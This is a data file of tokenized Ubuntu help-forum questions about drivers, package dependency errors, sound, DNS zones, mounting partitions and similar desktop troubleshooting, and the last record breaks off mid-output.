470867	problem installing intel drivers	i downloaded the latest intel drivers for ubuntu 14.04 from : https : //01.org/linuxgraphics/ but i get this error . after hitting close the status changes to `` failed to satisfy all dependencies ( broken cache ) '' i ran 'sudo apt-get install -f ' but all that does is remove the installer . i tried doing sudo apt-get autoremove and then update+upgrade . and reinstall after that but it 's the same error again . i use lubuntu 14.04 lts
470868	installing openjdk on ( chr ) lubuntu 14.04 on acer c710	completely new to linux , bear with me . i 've just this morning succeeded in getting lubuntu on my acer c710 , thanks to the wonderful script over here . i 'm trying to see how minecraft will run , which requires java . i started by trying to install oracle , but it was the full jdk rather than just the jre , so i uninstalled it . i do n't fully understand the instructions for installing the jre ( being as it is n't on the repository and such ) . next i tried to install openjdk 6 's and 7 's jres . i tried from the repository , the lsc , and the synaptic package manager . all of them bring up errors during the install . the repository , for example : user @ chrubuntu : ~ $ sudo apt-get install default-jre reading package lists ... done building dependency tree reading state information ... done default-jre is already the newest version . the following packages were automatically installed and are no longer required : abiword-common fonts-lyx libabiword-3.0 libchamplain-0.12-0 libchamplain-gtk-0.12-0 libgdome2-0 libgdome2-cpp-smart0c2a libgtkmathview0c2a liblink-grammar4 libloudmouth1-0 libmhash2 libots0 libraptor2-0 librasqal3 librdf0 libtelepathy-glib0 libtidy-0.99-0 libwmf0.2-7 libwpd-0.9-9 libwpg-0.2-2 libwps-0.2-2 libwv-1.2-4 libyajl2 link-grammar-dictionaries-en xul-ext-ubufox use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 12 not upgraded . 15 not fully installed or removed . need to get 0 b/72.3 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y dpkg : error processing package tzdata-java ( -- configure ) : package tzdata-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : dependency problems prevent configuration of openjdk-7-jre-headless : amd64 : openjdk-7-jre-headless : amd64 depends on tzdata-java ; however : package tzdata-java is not installed . dpkg : error processing package openjdk-7-jre-headless : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of default-jre-headless : default-jre-headless depends on openjdk-7-jre-headless ( > = 7~u3-2.1.1 ) ; however : no apport report written because the error message indicates its a followup error from a previous failure . package openjdk-7-jre-headless : amd64 is not configured yet . it goes on like that for a while . trying to uninstall bits of these programs seems to have brought up a few errors talking about the same half-installed errors , and some bits of the programs are there and wo n't go away , but do nothing anyway - the policy tools , and the option to open my .jar in 6 or 7 's jres ( but , as said , this does nothing - not even an error message ) . i 'm floundering for what more i can actually say . anyone got any ideas ?
470870	two conflicting installations of boost ... cmake ... issue	i was trying to compile boost only in a directory so that i could point a single application to it . i accidentally installed it to the system , and now it 's breaking other apps that apparently do n't work with version 1.55 . these apps are compiled using cmake . original version of boost on my system : 1.46.1 i followed these steps to install boost by source ( except that i 've currently removed the local.conf file : https : //coderwall.com/p/0atfug -- this installed boost 1.55 by source . here 's the error it gives me in an application that bombs when it apparently finds version 1.55 . the app uses cuda , but the thing that changed was boost . /usr/local/include/boost/assert.hpp:102:47 : error : ânoinlineâ was not declared in this scope cmake error at testbuild_dax_cuda_cont_generated_testbuild_dax_cuda_cont_deviceadaptercuda.cu.o.cmake:256 ( message ) : error generating file /home/datahead/code/daxbuild/dax/cuda/cont/cmakefiles/testbuild_dax_cuda_cont.dir\ /__/__/__/__/daxbuild/dax/cuda/cont/testing/./testbuild_dax_cuda_cont_generated_\ testbuild_dax_cuda_cont_deviceadaptercuda.cu.o i think that the copy in /usr/local/include is the version from source . if i can just get it to read from /usr/include i think it may very well work , which will let me continue doing some work for now . ultimately , i want to purge the entire /usr/local/include installation and only use boost 1.55 from that one directory for that one app . it seems likely i need to tell cmake to point to the proper lib and include directory . i 'm not sure how to do this properly or if i need to do additional changes . this is my linux distro : datahead @ datahead-g750jw : /usr/include $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise
470872	how to scan for analog cable channels on a gadmei hybrid dvb-t usb utv380 in ubuntu 14.04 lts ?	i 'm having difficulty installing it .
470876	no sound in arm hp chromebook ubuntu 14.04 with crouton	update : i finally got my sound to work ! all i had to do was update crouton . the following link explains how to do it : http : //pastebin.com/umjyya4n i replaced `` raring '' with `` trusty '' because i 'm running 14.04 . in addition to this , i also reinstalled pulseaudio and everything worked fine afterwards . as the title suggests , i 've installed ubuntu 14.04 with xfce on my chromebook . sound worked initially , but after my first restart , i stopped getting any sound altogether . i have tried virtually all the workarounds found online , including installing and reinstalling pulseaudio and alsamixer . when i try to access alsamixer via terminal , i receive the following error : `` cras client would n't connect '' . in addition , i 'm unable to launch the audio mixer as it gives me the following error : `` gstreamer was unable to detect any sound devices . some sound system specific gstreamer packages may be missing . it may also be a permissions problem . '' no sound arm samsung chromebook ubuntu 12.04 using crouton this user reports an identical problem and i 've seen numerous other posts reporting the same issue . any ideas on how to go about this ? thank you .
470878	steam freezes at login screen	i have just installed steam on xubuntu , and after it finished installing it went to the login screen , but the screen is frozen , and i can not press the buttons . when running steam though the terminal it says : alex @ craptop : ~ $ steam running steam on ubuntu 14.04 32-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) [ 0522/174755 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) [ http remote control ] http server listening on port 35849 . installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) process 2764 created /alex-valveipcsharedobjects5 installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) generating new string page texture 12 : 48x256 , total string texture memory is 49.15 kb generating new string page texture 13 : 256x256 , total string texture memory is 311.30 kb generating new string page texture 14 : 128x256 , total string texture memory is 442.37 kb generating new string page texture 15 : 384x256 , total string texture memory is 835.58 kb and then the terminal gets stuck too , letting me type into it but not doing anything . i tried reinstalling and restarting the computer , but it still keeps happening .
470880	how can i play a custom sound when my battery is low ?	i want my computer to play a custom sound file when my battery is low ( say 10 % ) . how can i do this ? thanks
470881	no `` sound '' tab within properties window for audio files	i want to add the `` sound '' tab to properties window . i bet it 's a dconf-editor matter , but just guessing .
470883	minecraft wo n't install	i tried to install minecraft on my computer , but it wo n't display on-screen . i went to https : //www.minecraft.net/download and downloaded the jar file . i put the launcher on the desktop and tried to run it . it did not download minecraft . i can see the java icon on the program bar , but it does n't show on-screen . note : i have set the permissions to allow it to run as executable . another note : i have checked and it does create a .minecraft folder , but a lot of the minecraft files simply are n't there .
470885	connect presonus firebox with firewire under ubuntu studio 14.04	i have an hp compaq 6910b running ubuntu studio 14.04 . i 'd like to connect to my presonus firebox via the firewire connection and record through audacity . does anyone have any tips on how to configure ffado mixer and or qjackctl to get it working ? ffado mixer seems to load presonus_experimental but i ca n't get any further .
470891	apps stuck between two themes	after installing alot of random dependencies i needed for installing a package from source i found that most of my standard software had their theme changed , 3rd party applications seem to be using the correct theme , but apps like the file manager seem to be stuck between the two themes . check screenshots below : before : after :
470894	14.04 on yoga 2 pro : elan usb touchscreen issue causing theme reset ?	on several occasions , i 've booted up and logged in only to find that my unity theme has reset to the default ambiance theme . i 've also noticed that this only happens when i log in before the power indicator shows up on the login screen . looking into the dmesg logs , i 've been led to believe that this is due to a kernel bug with elan touchscreens , where the device ca n't be recognized until after some delay . i do n't care too much about the delay in recognizing the touch screen and other devices , but having my theme reset every time this happens is troubling . ideally , i would want my theme to be loaded regardless of usb states , or to resolve the usb issue in the first place . alternatively , i could delay the stop of plymouth until the devices are loaded . would it be possible to achieve any of these solutions ? thanks ! more info on the elan touchscreen bug : http : //superuser.com/questions/729894/linux-kernel-getting-elan-touchscreen-to-work-usb-debug-related http : //linux-kernel.2935.n7.nabble.com/elan-touchscreen-regression-in-recent-3-12-rc-s-usb-td743984.html
470895	gigabyte s1080 touchscreen tablet	i have just installed ubuntu 14.4 lts on my gigabyte s1080 touchscreen tablet and i am unable to use the tablet without a keyboard plugged in . is there a way to activate the on screen keyboard ? i have installed florence virtual keyboard however when i boot up the computer it does n't popup on the screen to login nor does it appear when i click on a text field . how do i set the onscreen keyboard as default so it appears when i press on a text field ? and if possible ( not at worried if i ca n't ) there is a button on the side that opens the onscreen keyboard , it is possible to link the onscreen keyboard to this button ( was default with windows ) . any advice would be great . cheers , brad
470897	application to sync facebook messages to ubuntu 14.04	i need an application that syncs my facebook messages to ubuntu 14.04 system . i will tell exactly what i need . the application should be able to keep a copy of every message that comes in facebook inbox . the application should keep this copy of message even if it is deleted from the facebook inbox or until i delete the message from the application . this is very important for me . so is there such an application or program for ubuntu to do this ?
470899	installed ubuntu externally , now says `` disk drive for /boot/efi is not ready '' when ssd internal	i installed ubuntu onto my ssd with a sata to usb adapter and everything worked fine , so i just put the ssd inside the laptop . it now says `` the disk drive for /boot/efi is not ready yet or not present '' when i try to boot into ubuntu . what can i do ? edit : i 'm impatient , so i pressed s to `` skip mounting '' is that bad ?
470900	why would permissions on a mounted volume be different when done manually vs. through fstab ?	i have a home server running ubuntu , and several computers connecting to it running ubuntu and windows 7 . my main ubuntu machine is having issues where any file or directory i move to the server will have read-only access , meaning i can not move the contents of the folder . i 've now found that if i mount manually via `` connect to server '' , everything is fine , but if i connect with fstab , i have the permissions issue . what would cause the createmask or permissions settings to differ when mounted manually vs. through fstab ? here is an example from my fstab : //192.168.42.2/fileserver /media/theta cifs guest , uid=1000 , iocharset=utf8 0 0
470901	how to disable multiple authentication ?	ubuntu 's policy of reauthenticating the user every few minutes for sudo commands is a significant productivity drain , especially if you have a long password . i realize that autologin can get rid of authentication entirely , but that would be dangerous . so what i 'm looking for is a way to enable authentication just when i first boot ( or return to my machine after locking the screen ) , but not like hundreds of times a day , every few sudo commands i run . one other thing is that it looks like this timeout is n't cognizant of the fact that i just logged in . so the first sudo i run always seems to authenticate me again , even if i logged in a few seconds ago .
470902	dns ( caching , zones ) in 14.04 not working correctly	trying to get dns working locally . i have a client vm that is a static ip and pointed to the local nameserver ( .250 ) via /etc/network/interfaces . both vms are set to nat , which i suspect may be an issue . root @ ubuntu : /etc/resolvconf/resolv.conf.d # resolvconf -u root @ ubuntu : /etc/resolvconf/resolv.conf.d # more /etc/resolvconf *** /etc/resolvconf : directory *** root @ ubuntu : /etc/resolvconf/resolv.conf.d # more /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.172.250 caching seems to be working ok on the nameserver ( surfer , the .250 box ) . forwarders { 75.75.75.75 ; 75.75.75.76 ; } ; here 's the named.conf.options zone `` rellek.nl '' { type master ; file `` /etc/bind/db.rellek.nl '' ; } ; zone `` 172.168.192.in-addr.arpa '' { type master ; notify no ; file `` /etc/bind/db.rev192 '' ; } ; here 's the local nameserver forward zone file ( db.rellek.nl ) $ ttl 604800 @ in soa surfer.rellek.nl . root.rellek.nl . ( 2 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; @ in ns surfer.rellek.nl . @ in a 127.0.0.1 @ in aaaa : :1 ; a record addresses ( mappings of host to ip ) sentinel in a 192.168.172.251 surfer in a 192.168.172.250 ; cname aliases sentinel in cname sentinel.rellek.nl . surfer in cname surfer.rellek.nl . and my reverse zone file ( db.rev192 ) $ ttl 604800 @ in soa surfer.rellek.nl . root.rellek.nl . ( 1 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; @ in ns surfer.rellek.nl . 251 in ptr sentinel.rellek.nl . 250 in ptr surfer.rellek.nl . nslookup seems to indicate reverse is ok root @ surfer : ~ $ nslookup 192.168.172.250 server : 127.0.0.1 address : 127.0.0.1 # 53 250.172.168.192.in-addr.arpa name = surfer.rellek.nl . forward is not root @ surfer : ~ $ nslookup surfer server : 127.0.0.1 address : 127.0.0.1 # 53 ** server ca n't find surfer : nxdomain anyone have any ideas ? vmware nating or dhcp to blame ? both the nameserver and client are pointed to the nameserver via the dns-nameserver option in the /interfaces file .
470905	xfce is malfunctioning ?	a while ago my custom keyboard shortcuts stopped working . after that , the panel started running in kiosk mode . now , my desktop icons have disappeared , and left clicking or right clicking has no effect . i have uninstalled and re-installed xubuntu multiple times , but the issue is persistent throughout the installations . why is this happening , and how can i fix it ?
470908	how to access windows partition/drives	i installed ubuntu 13.10 from bootable pen drive and during the installation i had overwritten it on previously run windows 7 . now i am unable to access the windows partition d drive , e drive , f drive from ubuntu . how can i access files under partition drives on my pc . what i have to do ? please provide gui instructions , if not commands will do it for me .
470909	connect to uofu wpa2enterprise	i 'm trying to connect to a wpa2enterprise connection so i can stay connected at the university i study at . i initially tried to connect via the gui , but i could n't specify some of the things that the connection requires , and after a while of googling i have n't had much luck getting it any closer . the requirements are here , but i 'll post them for posterity . wireless network name ( ssid ) : uconnect security type : wpa2-enterprise encryption type : aes ( ccmp ) eap method : peap phase 2 ( inner method ) : eap-mschapv2 root ca certificate ( s ) : [ links below ] install entrust.net secure server certification authority install addtrust external ca root user certificate : < n/a > anonymous identity ( outer identity ) : < leave blank > username ( identity ) : unid @ clinical password : [ your password ] install entrust.net secure server certification authority install addtrust external ca root so far i 've been trying to tinker and research what i need , but i 'm not having much luck . to install the root certs i ran . sudo mkdir /usr/local/share/ca-certificates/uconnect sudo wget -p /usr/local/share/ca-certificates/uconnect http : //setup.utah.edu/clinical-uconnect/rootca_1172_5268_0.cer http : //setup.utah.edu/clinical-uconnect/rootca_1172_5268_1.cer sudo update-ca-certificates for the actual profile i 've got in /etc/networkmanager/system-connections so far i have : [ connection ] id=uconnect uuid=c7f10f15-d0e1-47a9-bf44-e8c71e6131d0 type=802-11-wireless [ 802-11-wireless ] ssid=uconnect mode=infrastructure security=802-11-wireless-security [ 802-11-wireless-security ] key-mgmt=wpa-eap [ ipv4 ] method=auto [ ipv6 ] method=auto [ 802-1x ] eap=peap ; identity= [ my-school-id ] @ clinical phase2-auth=mschapv2 password-flags=1 system-ca-certs=true any help would be super appreciated , so ( as always ) thanks in advance !
470911	supervisor + ruby : ca n't get supervisor to run my ruby script	i figure this is a simple issue . permissions or something that i 've overlooked and ca n't seem to find . however , i 've just learned how to use supervisor . long story short , i run ubuntu 12.04 server with the supervisor provided by the standard repositories . the default ruby is 1.8.7 which is really old so i use rvm to allow me to use ruby 2.1.1 . the rvm package even allows me to define a default ruby version to use . this command works from the prompt : ruby /path/to/script.rb `` 3 '' supervisor script.conf : [ program : pusher_script ] process_name= % ( program_name ) s_ % ( process_num ) 02d command=screen -d -m -s script ruby /path/to/script.rb `` 3 '' autostart=true autorestart=true stderr_logfile=/var/www/ver2/logs/supervisor- % ( program_name ) s.err.log stdout_logfile=/var/www/ver2/logs/supervisor- % ( program_name ) s.err.log numprocs=1 user=gabe stopsignal=kill the ruby script subscribes to a pusher-client channel , format the data provided , and then send the data off to gearman for saving to a file and the cache . i have noticed that the gearman gem will die every so often . in the past this led to a situation where the script still appeared to be running but no new data was being acquired from the pusher channel . what i 'd like is for supervisor to kick off a single instance and restart that instance when dies . the command line that i enter at the prompt is what i 've pasted into my .conf file in the supervisor directory . the supervisorctl program sees it when i exec reread and adds the process when i exec update . i even get a log file with the name of the program name . however , the ruby script does not start . i thought maybe it required screen in order to work so i tested out how to make it work with screen and used that in the .conf file ( as you see in the provided sample ) . no screens are running . i have looked at the log . it is empty . it has the same permissions as all the non-empty logs . however , what i did notice is that the logs are by the root user rather than the gabe user specified in the .conf file . so i sudo su and attempted to run the script as root . the command ruby ver returns 1.9.3p0 under root and 2.1.1 under the gabe user . additionally , when i attempt to run the script under the root user i am informed that it can not load the pusher-client rubygem . so is n't the script supposed to be run under the gabe user per the .conf file ? at which point it should run fine . however , it is n't running so is it run under the root user and then the owner is changed to gabe once up running ? ultimately , i 'd prefer to get the script to run under the gabe user with the rvm setup i have so i 'm not having to maintain one under the gabe user and under the root user . how do i get supervisor to manage this script ? thanks
470913	got a problem with package mangement	the last day i got a problem with my package-manager saying that '' an error occurred , please run package manager form from right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'error : brokencount > 0 ' . this usually means that you installed packages have unmet dependencies '' i have no idea what to do with this , please anyone help me to solve it . -thank you
470914	geany symbol menu in vim	on the geany editor there is symbol tab which when you pass one c program to geany it shows all functions and classes and variables and macros in the list . so is there any ability like that in vim ? if you have no the idea about symbol in the geany look here .
470915	clean install of ubuntu 14.04 - screen goes black after login , but mouse works	disclaimer there are many questions on this topic and none of them apply to my situation . note the following : the system previously ran ubuntu 12.04 desktop 32bit without issue . this is a clean install , not an upgrade . previous install was overwritten . the black screen comes after logging in , not while booting . the black screen comes regardless of the video driver , default ( nouveau ) or nvidia it is not sporadic , it happens all the time . it is not the result of returning from sleep or suspend . i did a clean install of ubuntu 14.04 desktop 32bit ( ubuntu-14.04-desktop-i386.iso ) using liveusb . the installation completes successfully , the system reboots , and i login . after logging in : the screen ( with the background visible ) flickers and eventually goes black ( no background , no unity panel , no unity launcher ) , and i am able to move the mouse about the screen . just in case there is an update that resolves this , i switch to tty1 ( ctrl + alt + f1 ) and type : sudo apt-get update sudo apt-install dist-upgrade reboot and same thing after logging in : the screen flickers and eventually goes black , and i am able to move the mouse about the screen . the machine has nvidia graphics card , the geforce fx 5700le video card . lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation nv36 [ geforce fx 5700le ] ( rec a1 ) so i install the nvidia 173 drivers : sudo apt-get instal nvidia-173 reboot and now after logging in : the screen goes black , and i am able to move the mouse about the screen . there are a number of post about ubuntu 14.04 black screen after login , however they appear to be the result of upgrading from a previous version of ubuntu and not a clean install . regardless of that i tired the solution to that problem which is to purge the existing nvidia drivers via sudo apt-get remove -- purge nvidia* . not to my surprise after rebooting and logging in , i see the original behavior : the screen flickers and eventually goes black , and i am able to move the mouse about the screen . i also tried to boot ubuntu in recovery mode using failsafex , i see a popup that says , `` the system is running in low-graphics mode '' . no mouse is visible . i hit tab and enter . next screen says , `` what would you like to do ? '' and `` run in low-graphics mode for just one session '' is selected . i hit tab twice , highlighting `` ok '' and hit enter . next screen says , `` stand by one minute while the display restartsâś '' . i hit enter . i see a shining black screen with no mouse . i read that this is might be another issue since it occurs *after* entering your password on the login page .
470917	can i have multiple local juju environments ?	is it possible to run two local juju environments ? i sometimes like to kick off a long-running deploy , but i 'd still like to work while that one is churning . right now , i get : dpb @ helo : hooks $ juju bootstrap -v error can not use 37017 as state port , already in use do i need to run another mongodb and change a setting somewhere ?
470918	burg returns to default after running `` sudo update-burg ''	i made 2 custom icons for the burg bootloader-1.a custom icon for bodhi linux and 2.gnome linux ... .i placed these images in the correct folders and changed their classes appropriately ... .i then start up burg manager and click burg emu and can see my images are in fact there.however after running `` sudo update-burg '' my icons disappear and everything returns back to default ... .can anyone tell me how to fix this ? i have tried editing the etc/burg.d as well as grub2.how can i edit burg and the changes stick . i am using the magic theme and i ve posted one of the custom images i made for this theme ... ... my custom icons are in the correct folder ... ..i have edited the burg.cfg file-menuentry `` gnome '' -- class gnome -- class os -- group group_/dev/sda3 { insmod ext2 ... ... i have edited it to be class gnome from class ubuntu ... .when it stays as class gnome my icon stays but as soon as i update burg it changes back to class ubuntu
470919	how to disable amazon lense in 14.04 ?	i have googled this . everyone is talking about unity-lens-shopping package , but i do n't have it . i also ca n't find any package for amazon whatsoever . how can i get rid of amazon and other shopping results ?
470926	php 5.1.6 on ubuntu	i want to install php 5.1.6 on ubuntu in order to work on legacy php application . how can i install php 5.1.6 on ubuntu . i have tried to install 11.10 and followed many online resources to get it working but all in vain . kindly help in this regard .
470927	metro theme for phpmyadmin not working	i have installed metro theme for phpmyadmin on ubuntu system . while the same file displying perfectly on a windows system but fails to load style on ubuntu system . is there anything that i am missing during installation or adding new theme ? currently using server version : 5.5.37-0ubuntu0.14.04.1 - ( ubuntu )
470929	problems connecting to bluetooth headset - 14.04	i 've read carefully this post but still have problems to connect to one of my bluetooth headset . i have two bluetooth headsets ( shb71150 from philips , and wesc piston along with two bluetooth dongles one from thrust ( bluetooth v3 version ) and and belkin one ( bluetooth v4 version ) . for both dongles and both headsets philips shb7150 and wesc piston bt black i get the same result : the dongle manages to connect to the headset , but i have no further option in the volume control to uses the bluetooth device . thanks in advance for your help . laurent
470930	how do i get around os checks in wine ?	i got a lytro from woot this week , but did n't research the linux support . i have playonlinux installed and was hoping to run the windows software from there . the snag i ran into was that they have an os check . how do i get around this ?
470931	finding any remote connections	i want to find out if there are any current / inactive remote connections setup on my ubuntu desktop . is there a command , script , or similar that will allow me to see if there any remote access or connections to my desktop ?
470936	why does n't grive start and sync at login	when i login , there is no grive indicator in the taskbar . when i start it from the 'finder ' it works ok . i use xubuntu 14.04
470938	libreoffice icon on xfce switcher	i want to replace the ugly icons used for libreoffice on the xfce alt-tab switcher ( xubuntu 14.04 ) , but i ca n't find it on any theme of icons neither any system folder . i really do n't imagine where this icons are . any idea ?
470939	corrupt partition	i try to mount a partition but linux ca n't found the filesystem ext4 . $ sudo mount /dev/sdb1 /mnt/test/ mount : you must specify the filesystem type $ sudo mount /dev/sdb1 /mnt/test/ -t ext4 mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so $ sudo mount -t auto /dev/sdb1 /mnt/test/ mount : you must specify the filesystem type $ dmesg | tail [ 5034.298313 ] ext4-fs ( sdb1 ) : vfs : ca n't find ext4 filesystem [ 5034.298644 ] fat-fs ( sdb1 ) : bogus number of reserved sectors [ 5034.298650 ] fat-fs ( sdb1 ) : ca n't find a valid fat filesystem $ fdisk -l disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00011cd3 device boot start end blocks id system /dev/sdb1 63 3891344624 1945672281 83 linux partition 1 does not start on physical sector boundary . /dev/sdb2 3891344625 3907024064 7839720 5 extended partition 2 does not start on physical sector boundary . /dev/sdb5 3891344688 3907024064 7839688+ 82 linux swap / solaris i did n't remember how the disk was created . i try to found lvm group ... $ vgdisplay no volume groups found how i could retreive to my data ?
470941	ubuntu vm : why is it still there after remove ?	due to some problems on my vm on which ubuntu 12.04 lts was running , i removed the entire virtualbox system and i reinstalled a new one . after installation , i was surprised to see that my former ubuntu vm is still there with all the data i left inside ! can someone explain me why this happened ?
470943	i can not access any drive ( like software , movi , raaz ) from ubuntu os but i can access from windows os	my ubuntu was running very nice . i can access all drive.i use two os windows8 and ubuntu . but when i shut down my ubuntu os and start with windows 8 and i copy a folder from c ( desktop ) drive to movies ( f drive ) and i shut down pc and again start pc with ubuntu then i can not access any drive . ( software is root drive ) . unable to access âsoftwareâ error mounting /dev/sda6 at /media/kalyan/software : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda6 '' `` /media/kalyan/software '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda6 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . can you give me a solution please ?
470944	irssi : no terminal notification sound while pinged	initial problem : installed a fresh copy of irssi for my terminal . all settings are default . my goal is when someone pings my username , i am alerted through a sound notification . initial settings : i went to terminal 's profile preferences and checked : terminal bell = true i also tried a few settings within irssi : /set beep_when_window_active on '' /set beep_when_away on '' /set beep_msg_level msgs notices dcc dccmsgs hilight '' /set bell_beeps on '' after all settings , sound notification does not occur upon ping . what other settings am i missing ?
470947	network connectivity issue in ubuntu 12.04 lts	i have two network . one is local lan and another is a wan . in ubuntu 12.04 systems , i can not be able to ping or connect to the wan proxy . but i 'm able to connect to local lan proxy . please help me to resolve this issue .
470949	lightdm customisation kde or unity greeter in xubuntu 14.04	my favorite distro is xubuntu , only the gtk greeter let my eyes bleeding ( i know , its lightweight and simple ) . so i check these hints : is-there-a-list-of-all-the-possible-configuration-options-for-lightdm and : how-to-change-the-lightdm-theme-greeter i set the gtk greeter to the kde greeter and it works very well . but it seems there is no chance to get the customisation user interface from the kubuntu distro . so what are my opinions , to change the style of the kde greeter in xubuntu ?
470950	wine games not working in ubuntu 13.10 ?	since i saw good reviews on ubuntu 13.10 over 13.04 on wine games ( especially on mafia 2 ) i installed 13.10 . the wine version is 1.4.1 . still no game is working . everything shows .exe encountered a serious problem and needs to be closed ( like when i installed nhl 2009 and started the game it shows `` nhl2009.exe encountered a serious problem and needs to be closed '' ) . i tried several games . same result . is this due to any lack of dependencies ? please help me . ubuntu is 32 bit .
470952	i interrupted my upgrade and now apt is asking me to remove libc-bin	i have ubuntu 13.10 and a couple of weeks ago i tried to upgrade to 14.04 . however , during the process , the computer tuned off . so , the upgrade was not completed . now i ca n't install anything and that 's what i get in the terminal when i try to : reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libc-bin : depends : libc6 ( < 2.18 ) but 2.19-0ubuntu6 is installed libc-dev-bin : depends : libc6 ( < 2.18 ) but 2.19-0ubuntu6 is installed libc6-dbg : depends : libc6 ( = 2.17-93ubuntu4 ) but 2.19-0ubuntu6 is installed libc6-dev : depends : libc6 ( = 2.17-93ubuntu4 ) but 2.19-0ubuntu6 is installed libgcc1-dbg : depends : libgcc1 ( = 1:4.8.1-10ubuntu9 ) but 1:4.9-20140406-0ubuntu1 is installed libpcre3-dev : depends : libpcre3 ( = 1:8.31-2 ) but 1:8.31-2ubuntu2 is installed e : unmet dependencies . try using -f. if i type 'apt-get -f install ' that 's what i get : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libasound2-dev libavahi-client-dev libavahi-common-dev libavcodec-dev libavformat-dev libavutil-dev libboost-date-time1.53.0 libboost-signals1.53.0 libcmis-0.3-3 libdbus-1-dev libgsl0-dev libharfbuzz-dev libilmbase-dev libjbig-dev liblzma-dev libmgl-qt5 libmgl-wx5 libopencv-gpu2.4 libopencv-stitching2.4 libopencv-superres2.4 libopencv-ts2.4 libopencv-videostab2.4 libopenexr-dev libraw1394-dev libraw1394-tools libssl-doc libswscale-dev libtiffxx5 libwayland-dev libxcomposite-dev libxkbcommon-dev lsb-security pax x11proto-composite-dev use 'apt-get autoremove ' to remove them . the following packages will be removed : bluez-cups build-essential comerr-dev cups f2c flite1-dev fort77 freehdl g++ g++-4.4 g++-4.6 g++-4.7 g++-4.8 gfortran-4.6 ghc ghc-doc ghc-haddock ghc6 google-earth-stable hplip krb5-multidev libatk-bridge2.0-dev libatk1.0-dev libboost-dev libboost-signals-dev libboost-signals1.49-dev libboost1.49-dev libc-bin libc-dev-bin libc6-dbg libc6-dev libcaca-dev libcairo2-dev libcups2-dev libcv-dev libcvaux-dev libdc1394-22-dev libexpat1-dev libf2c2-dev libfontconfig1-dev libfreetype6-dev libftdi-dev libgcc1-dbg libgcrypt11-dev libgdk-pixbuf2.0-dev libghc-data-default-dev libghc-data-default-doc libghc-dlist-dev libghc-dlist-doc libghc-extensible-exceptions-dev libghc-mtl-dev libghc-mtl-doc libghc-random-dev libghc-transformers-dev libghc-transformers-doc libghc-utf8-string-dev libghc-x11-dev libghc-x11-doc libghc-x11-xft-dev libghc-x11-xft-doc libghc-xmonad-contrib-dev libghc-xmonad-contrib-doc libghc-xmonad-dev libghc-xmonad-doc libglib2.0-dev libgnutls-dev libgstreamer1.0-dev libgtk-3-dev libgtk2.0-dev libhighgui-dev libjpeg-dev libjpeg-turbo8-dev libjpeg8-dev libkrb5-dev liblua5.2-dev libmgl-dev libmng-dev libncurses5-dev libopencv-calib3d-dev libopencv-contrib-dev libopencv-core-dev libopencv-dev libopencv-features2d-dev libopencv-flann-dev libopencv-gpu-dev libopencv-highgui-dev libopencv-imgproc-dev libopencv-legacy-dev libopencv-ml-dev libopencv-objdetect-dev libopencv-ocl-dev libopencv-ocl2.4 libopencv-photo-dev libopencv-stitching-dev libopencv-superres-dev libopencv-ts-dev libopencv-video-dev libopencv-videostab-dev libpango1.0-dev libpcre3-dev libpng12-dev libpulse-dev libpython-dev libpython2.7-dev libpython3-all-dev libpython3-dev libpython3.3-dev libqt3-mt-dev libsdl1.2-dev libslang2-dev libssl-dev libstdc++-4.8-dev libstdc++6-4.4-dev libstdc++6-4.6-dev libstdc++6-4.7-dev libtiff5-dev libtool libusb-dev libxft-dev lsb-core nvidia-319-updates printer-driver-gutenprint printer-driver-hpcups printer-driver-postscript-hp python-dev python2.7-dev valgrind zlib1g-dev warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! libc-bin 0 upgraded , 0 newly installed , 128 to remove and 64 not upgraded . after this operation , 1,227 mb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 